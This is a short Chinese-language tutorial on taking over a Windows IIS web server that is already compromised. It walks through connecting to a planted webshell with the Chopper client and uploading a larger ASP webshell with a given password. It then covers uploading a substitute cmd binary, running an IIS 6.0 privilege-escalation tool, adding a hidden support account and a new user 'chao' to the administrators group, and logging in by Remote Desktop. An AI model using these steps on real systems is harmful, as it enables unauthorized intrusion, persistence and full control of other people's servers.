1.首先利用菜刀连接我们上传的小马文件
2.在网站的www根目录下上传我们准备好的的大马文件
3.这里我们上传的大马名称是chao.asp
4.之后打开浏览器访问我们刚刚登陆的大马文件地址,并输入密码clever
5.登陆进去之后如果发现CMD功能无法使用
那么我们就自己通过菜刀上传一个CMD,我将其命名为smallchao.exe
6.点击大马页面左侧的执行CMD这一栏
7.在shell路径这一栏里输入服务器端cmd.exe对应的绝对路径,这里用我们刚刚上传上去的smallchao.exe
8.WINDOWS常见命令:
net user 查看所有用户
query user 查看当前运行中的用户
net user 用户名 密码 修改用户密码
net user 用户名 密码 /add 添加用户
net user 用户名 密码 /active 激活用户
net localgroup administrators 用户名 /add 添加管理员组
9.先查看一下服务器已经存在的用户
我们通过cmd.exe去执行iis6.exe这个程序(iis6.0可以执行系统权限)
这里我们将SUPPORT_388945a0用户添加为管理员用户。
10.也可以新建一个用户chao 密码为chaogege123
11.然后将chao这个用户加入到管理员账户组中
在WINDOWS左下角输入mstsc呼出,点击远程桌面连接
12.输入ip,点击连接,之后输入我们刚刚创建的用户名chao和对应密码即可远程登陆服务器桌面
